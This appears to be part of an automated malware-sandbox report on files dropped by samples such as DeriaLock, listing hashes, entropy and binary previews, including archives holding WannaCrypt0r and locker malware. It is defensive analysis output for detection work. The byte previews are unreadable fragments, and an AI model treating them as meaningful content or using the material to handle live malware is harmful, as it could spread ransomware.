                                                                                                                                                            SHA-512:A31340E26227D945D9776768E9A2E27B6009002B69FF2650EB8E60EF28331CD508392C426996B7B6F3BC2A4F9B7B36AE9DF6F22D66D79B40F99993B54894115D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.:..J.....b._I..V.d.ei..;..0..x5z..0....P...~..;..:..~.'...m.T...V...z9.K1......|...#Aq. ]tF..*s.NwzRT5..#...)...].T...hH..U.w....j...(..2..`.=.,.7r....|...L..0VaPB.....2v..............M......cJ.....W.D<.-..;.%..P.b......~E....l.y...0]x...Z.P....q[..q.I....k..F.*.wl.h...W............!-..X9''e..l..2.....s. ......^..w....w.).i.33.:.|..3WBy5.mO....H....{]X...p.4......x..j.y..Ad}f.Hh<..c.X...../.O..>....8.[~......\...1".$B.....8..\..K..F..m.Y.9..a..d]K.$.._...G.{.|t.T].......p......<.?..^8Rn.G..o. {a...e[.....R?...*......lW.....?.!..TU*P...T3..V...4c.....e.....E.d.LH.Bz@..l.X<\.?.".!......B.k.E...].!v..7.)A].....`....k.I...z..-vx..G.p...(..'.:.].O..Q%...v....l;.0..pP.59...z*.....{..|.c.W..e."@t...D.<.;.T....i.$..P.3L`..Nt......,Hv...L.h.qoh...oZ.j.G...6.e.N...P'..{.7u...............a....n...=j.7}.?u..t...V........~/4q* ..oe..o...S.tMpq.Y.+....1..^).T0.M...E%.T.xc......qs..U.....X.\.".'Zu(.^;.0...Lc.]t.<.b...Q,.sQ[... .....Zw.#.db.k.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.814082328638476
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fx2K/dNtWw1u5/wP7ZUWAuEAldTaxpmEvED2LhC4:fVjJu5/CZHZldTaxREqLV
                                                                                                                                                            MD5:BABBB0AA16E91C89A68B76AB1D32604B
                                                                                                                                                            SHA1:FE6FCBFC0B8BDB9B523D86F532AB409B09E1197F
                                                                                                                                                            SHA-256:37CF4101039F04004677189D7AA2C2D2747590431580CC7B774C237F52C0D70E
                                                                                                                                                            SHA-512:14AADA1AB8C9BF3C7D84BFBFA4BCEF864E82787122278E34004550CD98FEC21B692384DFB6F66C3C86EF5EFA029E7D73540272AF7E2A9338A2B4AA3C3F4503F5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:].....F..5. HMOa....b..ssN<!..U.p..W..W..Xd;.^U!..|97..zq.._.p..............].!.G...%6i...Ym].F....;.F.......jk..3..B...b..%.N.>N.....%D6..}X.Y...........s...F.^.........,...%..V.u.~.o.....T..l.....h..SNQ*u.(s.p.....c.q..9.\.Hf.ws....z...~NB.K..@....j..c[......e.....6...Du....E..*N1.+.y.`.#.-.".-.U...+..&.j.!I.a+-Z......e...........cY...;......].2..C"...y\.e...w.....uDJ....F..U*2@...E...\...P..@P.#..........hL..Y...:k..[....G.......djn...y.\......k.....?6;.vC.SZ...z...4.+U..6...T.m6....p.grD....K........%. ...T.:G..a......6.....K...]_i\...F.Cq....wm....,v..~.,.R...;...@`sE!..\..A.y...b}.....~..(.o.....q....E..w..rz.2..YO.F...T...#..Y.V.s'.....CN..K_.&4.Q.1p`A..p++...d...H$..."X...h....gId....%....?..k.0...-..e.m..A...e_...,).Q...'..~&.E..z.9...\.6V.#m...@...&E.8L}..lo,......#}.O...(..,..E..~.7.L.x.....s}.,<j...U.?8h.B.W,S.........BI.A....t.....b...S...|n.....<.A.....!..#..f37.}..I...E..,..;dJ.8...'r.j.A....YcT..G..,..t........-.~.i...
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3477754
                                                                                                                                                            Entropy (8bit):7.999945362964861
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:0x8KJHkctwJdVlgBq+q1vqtWdhQIajy4AsOLgVv+L3QXz+B7m1qyapDgJmeiTLW:0x8KJX+dVHvtzaj3xWgw79icXW
                                                                                                                                                            MD5:E58FDD8B0CE47BCB8FFD89F4499D186D
                                                                                                                                                            SHA1:B7E2334AC6E1AD75E3744661BB590A2D1DA98B03
                                                                                                                                                            SHA-256:283F40E9D550833BEC101A24FD6FD6FBD9937ED32A51392E818FFFF662A1D30A
                                                                                                                                                            SHA-512:95B6567B373EFA6AEC6A9BFD7AF70DED86F8C72D3E8BA75F756024817815B830F54D18143B0BE6DE335DD0CA0AFE722F88A4684663BE5A84946BD30343D43A8C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........J.."@>.5...5.....Endermanch@WannaCrypt0r.exeo..h.....7...8..].}..!..'...4...dl..W......n.g.1x.;..:..$W...)@..]t ...s.I..J...B.:.|.fcJ...HtS..}.X..Pe..0.....f5U.../..^@x.O...i.....c....:no..."m.O.$........<..H..f$...0..G..V.D..y..Wn....2.F......O-..j..&...'V. ...6..p......S.....b<1d.H.W._.d'..4v<M{...0|...CS.Tf...L....+.@kI.PV...ZM.tp..L.....I......!..!.@n..gcSDm,.......{M..-.a._..6`~..:<...DT...f..d.(..."..xOsr.1W..3.*.........lJ...!...=....N..8...zU..J{.n......(:.-V.(.&.n..M.#dkT.....T..O.>.3j.0...U...:). ..`.."1...yQZ..tt....B.....)3e}6.2.b.....q..D...g...?..!...1...6.....U...k..M.J......R..zf..c...&.e2>........L........(P=.......Vp.T..2..&9.U..+..WPT.....u.......0...!DmA..&S....n..d..I.Jz#!..7....vn7.?...~.H...Wy. .7K....#$..q...E{.B.An..>...\..#3bq.H...>;j........].....3_zk..k.......a"S^B.f...D0....<J...4#..MZs......E..._>.L8Kr.0..z.....F...Z..~..!.U.g{X.....i&1....EV.P...C...F((.....)C...I.5oW.....2.c....&...>C0..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1654828
                                                                                                                                                            Entropy (8bit):7.999880621363435
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:2OiR+zJsyziTwWQRtQWgpn8QbX1ncWFwUGVF6VpHk:2OVdzVW4tQWgp8QT1XFwUGKPk
                                                                                                                                                            MD5:713F3673049A096EA23787A9BCB63329
                                                                                                                                                            SHA1:B6DAD889F46DC19AE8A444B93B0A14248404C11D
                                                                                                                                                            SHA-256:A62C54FEFDE2762426208C6E6C7F01EF2066FC837F94F5F36D11A36B3ECDDD5F
                                                                                                                                                            SHA-512:810BDF865A25BDE85096E95C697BA7C1B79130B5E589C84AB93B21055B7341B5446D4E15905F7AA4CC242127D9ED1CF6F078B43FE452AD2E40695E5AB2BF8A18
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........HpF..`?...R&.#...Endermanch@WinlockerVB6Blacksod.exe....E9u.....!j%..R.l.M7.I......m...............x'...o..2...`.FU}.,..s.DI..|j,.zXxA...B..uG.y....v.d.jx....p.X..c.i.l/!..1..T.._.z0..o......#.A..dA".;'E...Q..F.J....5.X!.~l......<K&..1..oC.'..Y.\....gX..3...CJ.?./0..7[.|d..._...y..X#..a.;......-..2..|..G.%W...\m..Y.&w/....."\......@.R..m<tgZV*...y..9+ ....R.V....7.8t....7..........O PZcW.....e.....7..}.K...4.*.w.DK0...KbV.H..W<......g7.".js.H...f..\...2./KX..@.p........\.F"..S.r.-,.b._E.{...=...w..2;w.&.S..K.Fg[.d#v..R..<L.k.@..<2.t<.5}e...v...rP......6.?T....g..................#.........v......O.l;. ....=.{.m.......C..._..[$A1P.9....h.d.K.m._...:j.....:.kJ..."wz........6.+..yi......e....,5..%....J..k..I...;...s.?..\H..7=.$..VbU.#^........VIS>..Kw=W.YO..;.k.[$3..lM...G4U.9..)=....-.....'.Y......R....=.b.R..j.....?..y.,.......<GT"..Y.Z.....b...s.f.*...I.....[.D..J=...l.p.s3]g,....vD..8.]...QW..^..X.y9..:...I..........xA.oj.....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):77102
                                                                                                                                                            Entropy (8bit):7.997393453617121
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:0Nm7bj9DAfxcbnnOOPjaW7S3ayJpOGtz57MC4Wlzy1vG1NyY/:qAbj9EerOOPjV23ayeGpM+18c
                                                                                                                                                            MD5:213743564D240175E53F5C1FEB800820
                                                                                                                                                            SHA1:5A64C9771D2E0A8FAF569F1D0FB1A43D289E157C
                                                                                                                                                            SHA-256:65F5D46ED07C5B5D44F1B96088226E1473F4A6341F7510495FE108FEF2A74575
                                                                                                                                                            SHA-512:8E6B1822B93DF21DD87BF850CF97E1906A4416A20FC91039DD41FD96D97E3E61CEFCD98EEEF325ADBD722D375C257A68F13C4FBCC511057922A37C688CB39D75
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK........;.=>.#.}.,...P......Endermanch@Xyeta.exe.V.t*J...:K.J.....(.T.........zv.....+jQ..s.l..'OZ..5.a.c}..>..+.M.\....C,c...E.L6@ml.D./.&W..f^...`........T.%.u....X......%..F..i...'.F.....R-.8.9f:......d...Gd.B../...&g.c.T..P#.].>w..&S\.i.b.....s..|.....P............[.}..y...h.5]v..a....I..H.?.......B.Z./<.%.S..v...q....#.g,{E.a..&k....]...[8..%.x U#..-.-&R..M._|e.+.1.L.+.%.U!..iK....y6.r%..NR9......F... ..J~..n.]....'.J$+._l'.F..........L....-b.....'...8......0.Q...._...i..=%...M..?.)`t...2..Te....7\'. ..m....~}....d...:%...7FV&..Y..=.xG...*.)9q,....}..u.H.@]7f..T[.....{.....$E.f..x.s.N'(XI..j.X.b\..J..,..I.<.>....!.nW...4..7R{ ..?......PG6.yh....f`..".J B.l...'6.&q_..Fhr@.:..kkbiF...2/q..^.@.DH...s.^..7@...&.....\3.;:.%' .?.......D....C?....A....X.p..i.7.YY:L.JE.{..CYfp...n..<.wXa%}..........X.#I....:.eu.....:......FMUk.l.O'...'....].*^.95..i.F..sB..A.ZG.]/...+.....3.r6.8*l.....G8A4}.C..1.~....`....|..~....nL>(@..p..~..z.....}Fck..W.....J
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Sep 29 20:45:45 2022, mtime=Thu Sep 29 20:45:45 2022, atime=Fri May 28 08:03:30 2010, length=9421312, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1129
                                                                                                                                                            Entropy (8bit):4.69781448652876
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8mPgGp/8ydOEieJnHtLAcfndH4deUU0vWM7aB6m:8mPgU8ydOGJnN8cfndYdniB6
                                                                                                                                                            MD5:D873EFA71CABBC2F32C63DC10F831A54
                                                                                                                                                            SHA1:CD6C97199DAF3E0A40A1A9B11E560EAF284119B9
                                                                                                                                                            SHA-256:5A3A8C31E909A44693300DB2A5ADEF4645D1C9C4546C17C4EAD4C35EA13E3A22
                                                                                                                                                            SHA-512:4DA320758F04EB8513E5245450CB35DD39C696C3D65B3BDB6CB4B82F733E87BC74C826A1F4F9A323519F27265FEC0FAC5140FD6ECB7E81EF9DA8CF9FFA104DDE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:L..................F.... .....T.L.....z.L.....D...............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.=U......................V......[..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....h.1.....=U....ANTIVI~1..P......=U..=U......]........................a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.....f.2.....<pH .avpc2009.exe..J......=U..=U............................H...a.v.p.c.2.0.0.9...e.x.e.......b...............-.......a............C.......C:\Program Files (x86)\antiviruspc2009\avpc2009.exe..9.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.\.a.v.p.c.2.0.0.9...e.x.e.&.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.........*................@Z|...K.J.........`.......X.......965969...........!a..%.H.VZAj.....c2.........-$..!a..%.H.VZAj.....c2.........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1136
                                                                                                                                                            Entropy (8bit):7.825984162405617
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:kBJlGyOYfgOFPIJARRMPPUskL0SNDjdelQY3YuyE+NmuW4wIpImbn:zEf7Fgn9ts3OYuJMFW4H/b
                                                                                                                                                            MD5:E0D14F5C91B23C7BE3BB6DA222DC04BD
                                                                                                                                                            SHA1:5E780F7AB525600B925119904A20859629E961FB
                                                                                                                                                            SHA-256:F7B8DC1FFE183FF99FB14B02B5E1B5E52977B94580F90EDE8017FDB831083B8E
                                                                                                                                                            SHA-512:DBCD8F952F4994A740342D83114526CBDE4C21EBCB3BA5562D2CE73878C73A801A645CA3CB9C553C9781A44D78685B8C5855E6F8F88C85CB03E211DCBBF6CADE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.t..D..w)..@f.....<1..%......Q...>gJ..e..Y...5..a.......`.E..[......+...`.._h.......k.S...'ss...d5..^s.X..y...6...Uww[....:.`4.?...k...;.b....n.Z7.]...a.......W$u,;.L..........[....{.t...'....H.kh..%.N:..]As..'.....]..[@.2[.C....@...d~.d.j..l.^...g...#..M3...Z.c.obx.N/~....1..REg..../Kvc.VV..F...?C.........X."..~....<....y`.j/..T...ce.....4;.F...4.<....m._......up.G.p,Mv....p.T.8.r.zc...az0.`./..o...G..a1',....]....Z.*;@]......w.5..Z....U.....D..r.....fgN9..8...`......QL)X.e.........ViB..q..Z.(npl.6j!!J....mf[..EG$.......4.M.%.....{.#X.%gR...?C%.....e4.9d^...O8.......c......L#....*...i.3N,....\..A.\.>.*..H%'eO...H..it.b.b..r@.!=]...1........d{...M....k.4.}.a.s.v..d....".B...`}zAq4{...zJol.....G.q..U..Z'..`BZ.Hd....i...5.y.zwX.D.16h-G.......v.....>. ....'J1!s..s.L...5..6....X..|..C......CUd..B..Wl/.>..{......1....q}._W!hJ..k.*..+\.w &h.~&.K....Qn.om.9.PfH~..lo:..9.E.4....'.;.....Z.u..n...-/./1fZsT#.p..."..{...M........f$.B.....}..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.780520980165524
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:hJPfI7E+hWrB+kJFyIV/i2ZHLgQ57VYVfF852Epbqu:hVf6H4rB+kJw2t77Vid8HT
                                                                                                                                                            MD5:F86440E4F7848C20919873D516DF59CD
                                                                                                                                                            SHA1:6A76A6FD71D9DB821E7BFF56EEFC1F80A3369FD5
                                                                                                                                                            SHA-256:D2AD12DA20A21FBE1B7FACCB025AC2DCFBA171E75D278104320BF223F21DF791
                                                                                                                                                            SHA-512:BBD99511DD8EEB55AF9C761731428D7F6A915C4A4DD7588540FFA75B3E19594B5F474FAC93B84E764A18F794A34A245CF5D8D975569A691F7A3D9AC42A843FCD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..g.N,.S......A........;K.....-....L.>N.....t...Z..qF......A.........bZ#....}.{Qv..x.{ .. .4.8..%q.n!...l..^...t..|..z`.R.'.....e.H.{Zu.n..R....c.C!..ULj.h....&{O...q......2N.]^..HE.....r.#.GR.....y.,....&.....'K.n.V....T..r1....K..%L.3.....3..V.p=!...2......i..x....J.q*.ijk.v>[.....q...Q.X...a.``72....,%....4.)..1..k.x..IA6.......>.1...i.OX.(. a..l...a.#]..l.n...E.".k`s3.bR..D.q...."D....Nm.E.2].uH.W..TJ.L....|2.At....0.k...N...[!N...8.PU>.......r..A.(cI@..0BU..2........2:./...@.Z...%.>...2. ".X=..l........Q....aL...OQ...G..g2..u.lm4...i..... .*..D...R6.9v. .7Q...V.W.....S.....fZ|..Wj...+Q..L..SF.P....^Q.g!.......m^.L..jp.?/...G.b.}....@.R;...S.r...|[S..@J...v.Z>n..(-.l]..O.K...?....VV...=..4D.....2....k..H..o.#t.../............C.gM.v..?.e....b...L.......e..$..O.a....;.4..F..^...M....H.....T5.m.....jW..#5..d.Z'.0.w.s.nD..&.G.].K.....38..qH?.....x...2.~.(..R<.E!.:.kfO..$A.*.TCD+....V.>...N.)N?<t....9>.5.%..X2.V.8.:.s.l.i.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:COM executable for DOS
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.802280949116347
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:gmzOtsKabmVqQ0q0Hds3yM3xQM6VkCDiJLU713tqUF:rzOKUVtf0HS3yQ1W3GE3tj
                                                                                                                                                            MD5:241785E1E2B9DDC342052EE786C9B4F3
                                                                                                                                                            SHA1:E028AC7C39E76E21F91A3CC87B63B278BC811D16
                                                                                                                                                            SHA-256:63B91F3E4F8160A6A4F22442DDE09EF8085CDEAD14721F5F1866271A8A1C64A1
                                                                                                                                                            SHA-512:86787A9EA7203514AE18BD91025A6449DBF6C059739C1A50E33EA3197B954374C4E479667CA4B46A91AE90F42A2B9DD7FBFF3F4186A2BFE4BB631CBF90617F39
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.........D#..gq.9...6scW0}.s".......5.C.._..p......;,.4.....i4..$C..s....H.g.w..[...^.j.X.u...N=..BJ2%.....-..F.M3jn.]....I..k....U.z...{.....v....GP...)..Z.S.......#...acg...Q...hw8..~.k.\.u.S.....!..@.=.(..U.C...l*Nm7+.....1.9J.y....m.s.9L.`...i#..n....=...Y.X(@dN+.,.J..0..'i.S.G.i.......R..g.D...r..74.@..'.:....n`.. ...k._f.=h.D........-.....N.ln.$5...6.r......[.0.nr$.5.`.6c.o9wKR...l)w..l..Jb/$.......3..e.....,?..bV...."..p....g.[.6.5;..g..-<pZ......R....*U.|<..M.j.W.x...6.....@C8.<A..rg|K.(.....5...].J..Zuh..fU..Qs..G....q.u5.m.8.8..d..^.TA...<........!Fd.g571."....k.9a.Z..g.k......".7....n....e}....g.N......].a..\T..R......0.....D7..9..b.......O.,L&.;.... y.'y......Z..s.....Q...*...%9Sp)...9..?.BN.....6.^z....v*....g.h<.}CF.|..d....l.4a.=..Y.............Iq....e.&d.'{..........G..P...o......"G..".l.'Z.k.$pz?../p...T..h .i..}... ...iJ.'..0...W("/.8-.6.9U.9.O.M.b...Kq=....5g.(.4..F...(.-&..f...<Cv..&..r..Ci...~Y-y...}..;.p.,c.....f.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.827318704016807
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:lW8wO3UxJPFdQlgkhoiEvOh5/kd9jpBf4s+YC:JVExJMg72hRu1l4XYC
                                                                                                                                                            MD5:93E6B69B22B9869B009F65B546E435BA
                                                                                                                                                            SHA1:27DEC1E8AD6C94BD8FE64C6BE5C22F3F02720CC8
                                                                                                                                                            SHA-256:80841ADC1F147FA9D211A64E2E057C87023078FAE2126112633D692246817FC6
                                                                                                                                                            SHA-512:BBCD3D7412B9FC44258C5C7E72953181942AE6A9CB67E8469AF2576F14CCC1786F6CAB3BD12CE87D2327ECC79DDD4463DF230B7C22F0C8C44FB32B78AA508A07
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:/.T...g.f.4...... ...L.R!?(.....Q."r.("!8.h.....w.F&.5+..y.-.g.t.E.Q.2..H.O.`.-&.c...:.0}D.....V.].zn....q..y..kF..Y..\.......mJY..|..]7]2._1Q.K.}+8kVb.](...*..U....j....61.h....)7....v......b...i..nG.g\u.t..e.56.:1<VG5x.}|.....q.....).P..U..0.x-@...D.....@...&^J....K.|j......K. ..KP..X...:.2t...u'.'.....5.A...H.%z.b.w..<.....9w...l.T...<.M./.-.8.1G.W[-u.c.....d.}d.I..*.../..2#.q%.....`1...>.w.~0M!U.=z....L...o......b`..F4U...... .L...=4.#..0@.,......1.p0...~C.(.}r...0M..V.D~k...fe..r....._.Te<.yx1J:.R.N.w......N...T.Kke}.D...n....p.z.] .|O...T..at.....#X.....V.*W..G.D.....v/..S\xw.BL.......WD..V..:...T.x..1.r..........6...#....V.e..y....-.j.....Zc.....|.!...P...wt...8@BDj......c.K...jL.z....Q..d..2. .H.qp^.`.8.e4s...s.Y.....5......b......f.Ge.].Nw.O.x...vJ..G..#..X...k..$....H..F...n.\2.r..$s.q....`[~..K...5.....C-.c...\0.vv.t.7;.~.K....p...<..[...!..&4F....L.T.$.......SF.....?,.7.w3..C....B...X.`.<..."{z....T..?{R../S'.....I..,*s.w....<K...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8272920754885655
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:kNzhP3yeu/kHXIoOtDf/gBphtKMSlXahQqmeNV7qfCcELQbP:kVhI/kixwZhSdaeqXbeacEuP
                                                                                                                                                            MD5:B43F0353CA1644AF68DA91AFD35942CD
                                                                                                                                                            SHA1:ED64D4190B7F31C7C137DB18FA05F7A86C19CCCE
                                                                                                                                                            SHA-256:17514C5604A9274D96FDA0172E1286840AC2866640CE5F6857002F9EDB5435F1
                                                                                                                                                            SHA-512:8D3900BF636BB7C1BFC9EEFAF8B617E74B8AD2692F082996A729F60F2B03E296CA39E1E4F20A535A6F95A0BBCFC19C5E55DE271BC986EC2E02F80CCCDF4A7888
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..27.......l.......fuh..R.%..e.....W.Z.H^r.....q.-0....y.Q.....[......V.-.....H..p..f..Fiqd.!.<....p.'~....B..~......J.....!/.3......:}...W/%'Z.........].s....cn.......X.t/`.2..#.TM....$J;.s..Y4....h..6.mc....;.@7-8...^...l...6.lA.e...IDQ..B-OHP...U3.'f!...?...[.x..z..H..i.yo.....N....N;...$;&....kn..j. d-s[.x&. pv..........."......i....}......J....p.1."..A..J....F..&.~Y|....|..%MP...rRS...L..$...h...ke.0.....f..L,.5.6....h.......T$Q).Hos....L.f...mXMo.R.*....W.w.0..c...L.....T......*%..W.j...GA.?I).X...Vnr$......8z.WY...qyE.L..R..x....E...4..F...6......=?.w.%../.../....O..............xt.......It._<$x%.....BK.d2l.\....>q.V.].6h.........OV.X00..75...qB.8G...0ml '....o.3.!b...D.C...`G+3........e<]X.;....s...:.m..^C.a.X.'E..*.....i.DG......../.=@.3..q.r_Ak8v...!G..k.&m.}...5u2...).y.P.P{...Ytl.....2p|4,.s1I..dE...u3@.oG...e.#..kL.......Z....f....y.....r...........Di..st..!..o..@\dr.Z-.......]+N..2.......7l....h..........`...pX.....!..+..E
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8172519334375385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2xNxFXfuMwPHo3xGq6CRs7oCFFjoZJi+kh/gSbg6oB993kqQp:uxBGMAaxGGsTFyJ5E4SojUqQp
                                                                                                                                                            MD5:5D59990446C7E2BA1BF130D9BDC535B6
                                                                                                                                                            SHA1:E16AA0866D285DAB4B71371979B13EC13EF76CC0
                                                                                                                                                            SHA-256:05E00ECAECCF81478D78E4A9B4DE10C71068A5CF633C3D6746DD69B5A9166E87
                                                                                                                                                            SHA-512:9044F9A67F19871193D6726B6B13E4D35A80B6F5D50F278578B503B961905488AFC08C805503FBA4368F4E31DF62ED0FCC078CEE9F30C8742388B2CD568B02B7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...'1>..u.....J.(q.yC..o.9e.r.......rt&e.......Y&..T..k..b.O@. V.M.=F4....!1m*.:.....e.....V...u.$"$5./[MU...OWaB*....rY_.R.\...i.....`....M...`v..S.{..5.$i...L...g.{.W..Rw.j6Y.4>.-...b.y......Z.w........f.....E*.;.6.h.M.....S. Ru..UN.93....Kv.f.-.O.$ ~....i.C.9,..e........D.};...O.WVQ......i..WQA>CJ4 ...U.D.`B{..N..#.k^.+...=w7.Ve.6u..w.....GB..G...x....Hhu..p..i6...Bd......r-...Z....[^...-...h.k6.`....p|~...s.V....7DR..f2.;v..8|..'S....8.^.6.......U..:t1.%..T..G.rao..J`n....Gy^.....T.f.......k*.Y3H.,.V.d.gj.DH.G.`.q\.....NC..`f.n.[G.s..G.R.a... ...(Y.ut0..J...FJ....2......T./2|d.C.....he6. a.WA..[w:V...?...T.....I.:.I?q..d.^..T./.......r.O.SS.R.....c..px....]u ....Y......f......JM.>...=.....W].....;.........A.M.e.].f"O........O.j...f.....T.j.U..+T'.Q..F..N..l......%P?e.+..).1".Br4.......Z_....@.x.k.R7bc.........KN.=.6.7...V.r.._..V.n.....ynN..K1.[.P.`.m..};.V..m.2.....w.......e..~_....(..hU.~...Y.A.....8I;..'......oI.^....M.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.827078346432836
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:nG72xjuwsR/UiK6xfziEM1LBaLyM+upUUmE9dOyVBisd:nG72xjuv/UiK6RNM1WyM+upU5E9dRG2
                                                                                                                                                            MD5:0ADA0C64B51E26D91EA5AE9C2EC44C77
                                                                                                                                                            SHA1:F81A60F63D3351CBE81F2A60C343FFA2D73F1CC1
                                                                                                                                                            SHA-256:961383A3B0E991F4FF8F8898B1E74D7FB9124DDCB877D42EDD7806D4E3372B1A
                                                                                                                                                            SHA-512:928472547F8CFCED2B356BF7DBA474C0058243054172B8DF544393F27D067C0B5A181B316EB5593FD3A8D99B6037ED118C64BCEF55033B16F3B1E60C6058E57F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.p.E|...|....l..GO.u.......'....H....#.....o.`S..5.w..Q..Y*...z.VMc..9>.........)E'.....+=....IW-....L..D.....2A..6........i.?X.Zxcoa.R.GMA#G^..........Z%...I..`.D..[2..DL.a.e.V....%.pO.q.....%..5............R.i...YHN.B..T.3i.R..d..../O.... ..}.#$...........H.l.UK.m.m....1w9..mu~.'.5HR>..S.r?.".hG.5q.....{..&O...H...,.9.._..T&.}v..rL...m.......`.'.V..CL...)3@)|,|....C..*..%u.^........X#dh......M.3...^..u.=h..Jj.../...e..F..,L..y....|j....T.G.(!....7....3.Z:M.|.(.C./....M.q.....5Z9,TaD.e..>(<.Y..`.N..w.......".9OL..JV.lg.u.c.....!.........>...........].ju....bGd.<..=L5.!....]..?NCa3.(.{.;Ru.c..bpm.{W.j.y.......f......-0..8.M..W.........-.)/gA.+z....[.*.i ^.-.P.y.v.".|.:-7.V..s]..0..._k.r..."....W..l..O.:.S...jk.(..31.&/ ...c..Q.?..%..7..d.c..*pm:?..Djs...F......Z.*d...5.k.(s..sE....N....!...V...Ps.3.:.....3e...7..[.6.MR..,..oc>4@....f.zO...k..]Z....?|..Q...1-.r.......Fi.3.a...../...l...n.......{.........f..7in.a..l...9....@.6..g.y.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.795413063936205
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:OEf+VJjdMa6EVX9WiPff7ZA18Mlaa3QVHtKks0KkM7wy0IWD:/MX9Lnf1A1h3QVHtKkBKS3BD
                                                                                                                                                            MD5:E215BB746687F75389F03D25564957CE
                                                                                                                                                            SHA1:6AA8DB7D3A184C81F91931190303ADB3B15111FD
